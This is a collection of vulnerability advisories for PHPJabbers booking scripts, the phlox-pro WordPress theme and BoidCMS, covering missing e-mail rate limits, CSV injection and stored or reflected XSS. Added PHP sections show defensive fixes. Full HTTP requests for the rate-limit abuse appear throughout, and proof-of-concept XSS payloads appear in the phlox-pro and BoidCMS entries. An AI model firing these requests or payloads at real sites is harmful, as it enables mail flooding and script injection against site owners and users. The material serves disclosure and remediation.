<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - No Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48834<br /><br />Description:<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701528105_124/index.php?controller=pjBaseOptions&action=pjActionAjaxSend HTTP/1.1<br />Host: demo.phpjabbers.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 502<br />Origin: https://demo.phpjabbers.com<br />Referer: https://demo.phpjabbers.com/1701528105_124/index.php?controller=pjBaseOptions&action=pjActionEmailSettings&err=PBS03<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send the request to Intruder, configure the attack, and run it.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48834)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - No Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48833<br /><br />Description:<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701527883_624/index.php?controller=pjBaseOptions&action=pjActionAjaxSend HTTP/1.1<br />Host: demo.phpjabbers.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 502<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send the request to Intruder, configure the attack, and run it.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48833)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - No Rate Limit in Email<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo<br /># Version: v5.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48831<br /><br />Description:<br />Rate limiting is implemented in web applications and APIs to prevent<br />abuse, such as brute-force attacks or excessive requests that could<br />lead to resource exhaustion. When a rate limit is bypassed or not<br />properly enforced, it opens the door for attackers to carry out<br />malicious activities more quickly than intended, potentially leading<br />to unauthorized access, data breaches, or service disruption.<br /><br />Steps to Reproduce:<br /><br />1. Request Data:<br /><br />POST /1701526313_862/index.php?controller=pjBaseOptions&action=pjActionAjaxSend HTTP/1.1<br />Host: localhost<br />Cookie: _ga=GA1.2.1947184974.1699512498; _fbp=fb.1.1699512498084.844079488; _ga_NME5VTTGTT=GS1.2.1701527599.5.1.1701527608.51.0.0; _gcl_au=1.1.1109346785.1700383352; _hjSessionUser_2841064=eyJpZCI6ImVlNjRmZTlkLTlmMDAtNWJmMC05OTk1LWE4ODQzMmNiMGQ0OSIsImNyZWF0ZWQiOjE3MDAzODMzNTQyMDYsImV4aXN0aW5nIjp0cnVlfQ==; pj_sid=PJ1.0.3350592650.1700383356; pj_so=PJ1.0.9822262006.1700383356; CarRental=pb6krbqhp0ugdgduc39iagulp2; pjd=fmfk4mh95jvo519v16tcbmfte4; PHPSESSID=91h58pp95vek8qpp4jj62srb23; ShuttleBooking=uhei7cs26l7eoen1bfja4ciaq2; TSBCalendar=k2502gveirj5nhpo9ofnbpnrv2; ABCalendar=lkoj2qi9cq5dib87qothkc9d77; _gid=GA1.2.1184409840.1701527598; _gat=1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 502<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test<br /><br />2. Send the request to Intruder, configure the attack, and run it.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48831)<br /></code></pre>
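The three advisories above describe the same weakness: the pjActionAjaxSend e-mail settings action accepts an unbounded number of test-send requests. The following is an added defensive example, not PHPJabbers code, showing the server-side control that closes it: a per-client sliding-window limiter consulted before any mail is dispatched. The class and function names are mine, the limits (5 sends per 60 s) are illustrative, and the in-memory store is only for the demonstration; a real deployment must back it with APCu, Redis or a database table so the count survives across PHP worker processes.

```php
<?php
// Added example (not PHPJabbers code, PHP >= 8.1 assumed): a sliding-window rate
// limiter that a controller such as pjActionAjaxSend would call before sending.
declare(strict_types=1);

final class SlidingWindowLimiter
{
    /** @var array<string, int[]> client key => request timestamps (unix seconds) */
    private array $hits = [];

    public function __construct(
        private readonly int $limit,          // requests allowed per window
        private readonly int $windowSeconds,  // window length in seconds
    ) {}

    /** Returns true if the request may proceed, false if it must be rejected. */
    public function allow(string $clientKey, int $now): bool
    {
        $cutoff = $now - $this->windowSeconds;
        // Discard timestamps that have slid out of the window before counting.
        $this->hits[$clientKey] = array_values(array_filter(
            $this->hits[$clientKey] ?? [],
            fn (int $t) => $t > $cutoff
        ));
        if (count($this->hits[$clientKey]) >= $this->limit) {
            return false;   // rejected requests are not recorded as hits
        }
        $this->hits[$clientKey][] = $now;
        return true;
    }

    /** Seconds until the oldest in-window hit expires (for a Retry-After header). */
    public function retryAfter(string $clientKey, int $now): int
    {
        $oldest = $this->hits[$clientKey][0] ?? $now;
        return max(0, $oldest + $this->windowSeconds - $now);
    }
}

/**
 * Guard for the send-mail action. Keyed on the authenticated admin session so one
 * account cannot trigger unbounded mail; falls back to the client IP when there is
 * no session. The session id is hashed so it never lands in the store as-is.
 */
function guardSendMail(SlidingWindowLimiter $limiter, string $sessionId, string $ip, int $now): array
{
    $key = $sessionId !== '' ? 'sess:' . hash('sha256', $sessionId) : 'ip:' . $ip;
    if ($limiter->allow($key, $now)) {
        return ['status' => 200];
    }
    return ['status' => 429, 'retry_after' => $limiter->retryAfter($key, $now)];
}

// Constructed demonstration: seven sends one second apart from one session,
// then one more after the window has moved on.
$limiter = new SlidingWindowLimiter(limit: 5, windowSeconds: 60);
$t0 = 1_700_000_000;
for ($i = 0; $i < 7; $i++) {
    $r = guardSendMail($limiter, 'constructed-session-id', '203.0.113.10', $t0 + $i);
    printf("request %d -> HTTP %d%s\n", $i + 1, $r['status'],
        isset($r['retry_after']) ? " (Retry-After: {$r['retry_after']})" : '');
}
$r = guardSendMail($limiter, 'constructed-session-id', '203.0.113.10', $t0 + 61);
printf("request after 61 s -> HTTP %d\n", $r['status']);
```

The controller would map a `false` from `allow()` to an HTTP 429 with the `Retry-After` value and log the event; the log line (session hash, IP, action name) is also the detection signal for an in-progress abuse attempt. Limiting per account rather than only per IP matters here because the action is authenticated and the abuser already holds a session.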
<pre><code># Exploit Title: PHPJabbers Shuttle Booking Software v2.0 - CSV Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/shuttle-booking-software/<br /># Version: v2.0<br /># Tested on: Windows 10, Windows 11, MS Office 2010<br /># CVE-2023-48830<br /><br />Description:<br />PHPJabbers Shuttle Booking Software v2.0 is vulnerable to CSV<br />injection, which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the Options menu, then click the Language section.<br />3. Enter a CSV injection payload in any field, then go to Import/Export.<br />4. Click Export and open the exported file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48830)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - Multiple Stored XSS<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48828<br /><br />Description:<br />Stored Cross-Site Scripting (XSS) is a type of security<br />vulnerability that occurs when an application or website allows an<br />attacker to inject malicious scripts into content that is<br />permanently stored on the server. Unlike reflected XSS, where the<br />malicious script is embedded in a URL and executed immediately, stored<br />XSS involves the persistent storage of the malicious script on the<br />target server, waiting for unsuspecting users to access the<br />compromised content.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The vulnerable parameters are "name, plugin_sms_api_key,<br />plugin_sms_country_code, calendar_id, title, country name,<br />customer_name".<br />3. Go to the System menu, then click SMS Settings.<br />4. Enter any XSS payload in the "SMS API Key" or "Default Country Code"<br />input field and click Save.<br />5. You will see a popup.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48828)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48827<br /><br />Description:<br />HTML injection, also known as HTML code injection or cross-site<br />scripting (XSS), is a web security vulnerability that allows an<br />attacker to inject malicious code into a web page that is then viewed<br />by other users. This can lead to various attacks, such as stealing<br />sensitive information, session hijacking, defacement of websites, or<br />delivering malware to users.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. The "name, plugin_sms_api_key, plugin_sms_country_code, calendar_id,<br />title, country name, customer_name" parameters are vulnerable to HTML<br />injection.<br />3. Go to the System menu, then click SMS Settings.<br />4. Enter any HTML tag in the "SMS API Key" or "Default Country Code"<br />input field and click Save.<br />5. You will see the injected HTML rendered.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48827)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - CSV Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/<br /># Version: v4.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48826<br /><br />Description:<br />PHPJabbers Time Slots Booking Calendar v4.0 is vulnerable to CSV<br />injection, which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct<br />a CSV file.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the System menu, then click Language and go to Labels.<br />3. Enter a CSV injection payload in any field, then go to Import/Export.<br />4. Click Export and open the exported file on your system.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48826)<br /></code></pre>
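Both CSV injection advisories (Shuttle Booking Software v2.0 above and Time Slots Booking Calendar v4.0 here) have the same root cause: a user-controlled string is written into an export that a spreadsheet will later evaluate. The fix belongs in the export path, not the spreadsheet. The following is an added example, not PHPJabbers code: every free-text cell is checked for a leading formula trigger and neutralised before `fputcsv()` writes it. Function names, the column layout and the sample rows are constructed for the demonstration; the sample "formula" is a harmless `=SUM(1,2)` so the check can be seen working.

```php
<?php
// Added example (not PHPJabbers code, PHP >= 8.0 assumed): neutralise spreadsheet
// formula triggers in user-controlled values before they reach an exported CSV.
declare(strict_types=1);

/**
 * Return $value in a form a spreadsheet will treat as text. If the first
 * non-blank character is one of = + - @ (formula starters) or a tab/carriage
 * return (which Excel also honours as a trigger), prefix a single quote.
 * Leading whitespace is skipped first, because "  =1+1" is still evaluated.
 */
function csvSafeCell(string $value): string
{
    $trimmed = ltrim($value, " \t\r\n");
    if ($trimmed !== '' && str_contains("=+-@\t\r", $trimmed[0])) {
        return "'" . $value;
    }
    return $value;
}

/**
 * Build a CSV document from a header row and data rows. $textColumns lists the
 * column indexes that carry free text and therefore go through csvSafeCell();
 * numeric columns are left alone so a legitimate -5 is not turned into '-5.
 * fputcsv() on an in-memory stream takes care of quoting commas and quotes;
 * the escape parameter is passed explicitly ('' = none) to avoid relying on
 * the default, which newer PHP versions deprecate.
 */
function buildCsv(array $header, array $rows, array $textColumns): string
{
    $fh = fopen('php://memory', 'r+');
    fputcsv($fh, $header, ',', '"', '');
    foreach ($rows as $row) {
        foreach ($textColumns as $i) {
            $row[$i] = csvSafeCell((string) $row[$i]);
        }
        fputcsv($fh, $row, ',', '"', '');
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed sample: a language-label export where one translator-supplied
// value is a formula, one starts with "@", one hides its "-" behind spaces,
// and the numeric column holds a negative value that must stay numeric.
$header = ['key', 'label', 'offset'];
$rows = [
    ['lblWelcome',  'Welcome',           0],
    ['lblTotal',    '=SUM(1,2)',         0],
    ['lblHandle',   '@ShuttleDesk',      0],
    ['lblDiscount', '  -discount code', -5],
];
echo buildCsv($header, $rows, textColumns: [0, 1]);
```

Two caveats a practitioner should keep in mind. The quote prefix is a mitigation aimed at spreadsheet consumers, so if the same file is re-imported the prefix comes back as data; strip it on import or store the original value and sanitise only on export. And the same check should be applied wherever the application builds a CSV, including the Reservations list named in the descriptions, not only the Language export used in the reproduction steps.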
<pre><code># Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo<br /># Version: v5.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48825<br /><br />Description:<br />HTML injection, also known as HTML code injection or cross-site<br />scripting (XSS), is a web security vulnerability that allows an<br />attacker to inject malicious code into a web page that is then viewed<br />by other users. This can lead to various attacks, such as stealing<br />sensitive information, session hijacking, defacement of websites, or<br />delivering malware to users.<br /><br />Steps to Reproduce:<br />1. Log in to your panel.<br />2. Go to the System menu, then click SMS Settings.<br />3. Enter any HTML tag in the "SMS API Key" or "Default Country Code"<br />input field and click Save.<br />4. You will see the injected HTML rendered.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)<br /></code></pre>
<pre><code># Exploit Title: WordPress Theme phlox-pro 5.14.0 - 'searchform' Cross-Site Scripting (XSS)<br /># Date: 3/12/2023<br /># Exploit Author: Haktrak Team<br /># Vendor Homepage: https://phlox.pro<br /># Software Link: https://www.phlox.pro/go/<br /># Version: 5.14.0<br /># Tested on: Linux (Apache) / WordPress 6.3.1<br /><br />Description:<br /><br />A Cross-Site Scripting (XSS) vulnerability exists in the search form of the WordPress theme phlox-pro.<br /><br />Vulnerable Code:<br /><br />&lt;form method="get" id="searchform" class="searchform" action="&lt;?php echo esc_url( home_url( '/' ) ); ?&gt;"&gt;<br />    &lt;input type="text" class="field" name="s" id="s" placeholder="&lt;?php esc_attr_e( 'Search Here', 'phlox-pro'); ?&gt;" value="&lt;?php the_search_query(); ?&gt;" /&gt;<br /><br />Steps to exploit:<br />1) Go to the search form.<br />2) Insert the payload in the search field.<br /><br />Proof of Concept (PoC):<br />The following URL demonstrates JavaScript execution:<br />https://example.com/?s=ok&%27&gt;&lt;script&gt;alert(%27XSS%27)&lt;/script&gt;123=1<br /></code></pre>
<pre><code># Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://boidcms.github.io/#/<br /># Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip<br /># Version: v2.0.1<br /># Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56<br /># CVE: CVE-2023-48824<br /><br />Description:<br />BoidCMS v2.0.1 is vulnerable to multiple authenticated stored Cross-Site<br />Scripting (XSS) vulnerabilities in the "title, subtitle, footer,<br />keywords" parameters of the Settings and Create Page forms.<br /><br />Steps to Reproduce:<br /><br />1. Request:<br /><br />POST /BoidCMS/admin?page=create HTTP/1.1<br />Host: 192.168.1.74<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------9882691211259772119227456445<br />Content-Length: 1492<br />Origin: http://192.168.1.74<br />Connection: close<br />Referer: http://192.168.1.74/BoidCMS/admin?page=create<br />Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="type"<br /><br />post<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="title"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="descr"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="keywords"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="content"<br /><br />test<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="permalink"<br /><br /><br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="tpl"<br /><br />theme.php<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="thumb"<br /><br /><br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="date"<br /><br />2023-12-02T19:41<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="pub"<br /><br />true<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="token"<br /><br />83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd<br />-----------------------------9882691211259772119227456445<br />Content-Disposition: form-data; name="create"<br /><br />Create<br />-----------------------------9882691211259772119227456445--<br /><br /><br />2. Use the XSS payload "&gt;&lt;img src=x onerror=alert(1)&gt; in the "title,<br />subtitle, footer, keywords" parameters.<br />3. Save and check the home page.<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)<br /></code></pre>
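The stored XSS, HTML injection and search-form XSS advisories above (PHPJabbers Time Slots and Availability calendars, phlox-pro, BoidCMS) all come down to a stored or reflected value being written into HTML without encoding for the context it lands in. The following is an added example, not code from any of those projects, showing the two controls that close the class: strict validation of fields whose format is known (a dialling code, an API key) and unconditional output encoding of every value at render time. The function names and the validation patterns are mine and are assumptions about what those fields should accept; the sample input reuses the payload quoted in the BoidCMS advisory so the encoding can be seen neutralising it.

```php
<?php
// Added example (not PHPJabbers, Phlox or BoidCMS code, PHP >= 8.0 assumed):
// input validation plus context-correct output encoding for settings fields.
declare(strict_types=1);

/** Encode a value for an HTML text node or a double-quoted attribute value. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Assumed format for a default country dialling code: optional "+" then 1-4 digits. */
function validCountryCode(string $v): bool
{
    return preg_match('/^\+?[0-9]{1,4}$/', $v) === 1;
}

/** Assumed format for an SMS API key: a bounded token of URL-safe characters. */
function validApiKey(string $v): bool
{
    return preg_match('/^[A-Za-z0-9_\-.:]{8,128}$/', $v) === 1;
}

/** Validate a submitted SMS settings form; returns [bool ok, string[] bad fields]. */
function validateSmsSettings(array $post): array
{
    $errors = [];
    if (!validApiKey((string) ($post['plugin_sms_api_key'] ?? ''))) {
        $errors[] = 'plugin_sms_api_key';
    }
    if (!validCountryCode((string) ($post['plugin_sms_country_code'] ?? ''))) {
        $errors[] = 'plugin_sms_country_code';
    }
    return [$errors === [], $errors];
}

/**
 * Render the settings inputs. Values are encoded at output even though they were
 * validated on input, so anything that reached storage by another path (an older
 * release, a direct DB edit, an import) is still shown as inert text. The same
 * e() call is what a search form's value="..." attribute needs.
 */
function renderSmsSettings(array $settings): string
{
    return '<input type="text" name="plugin_sms_api_key" value="'
         . e((string) ($settings['plugin_sms_api_key'] ?? '')) . '">' . "\n"
         . '<input type="text" name="plugin_sms_country_code" value="'
         . e((string) ($settings['plugin_sms_country_code'] ?? '')) . '">' . "\n";
}

// Constructed submission using the payload quoted in the BoidCMS advisory.
$submitted = [
    'plugin_sms_api_key'      => '"><img src=x onerror=alert(1)>',
    'plugin_sms_country_code' => '+880',
];
[$ok, $errors] = validateSmsSettings($submitted);
echo $ok ? "accepted\n" : 'rejected: ' . implode(', ', $errors) . "\n";

// Even if validation were bypassed and the value stored, rendering encodes the
// quote and angle brackets, so the attribute cannot be closed and no tag is created.
echo renderSmsSettings($submitted);
```

Validation is the first line because the fields in these advisories have well-defined formats and a key or dialling code has no business containing `<`, `"` or `>`; encoding is the line that must never be skipped, because free-text fields such as `customer_name` or a page title legitimately contain those characters and still have to be displayed. Free-text fields get only the second control.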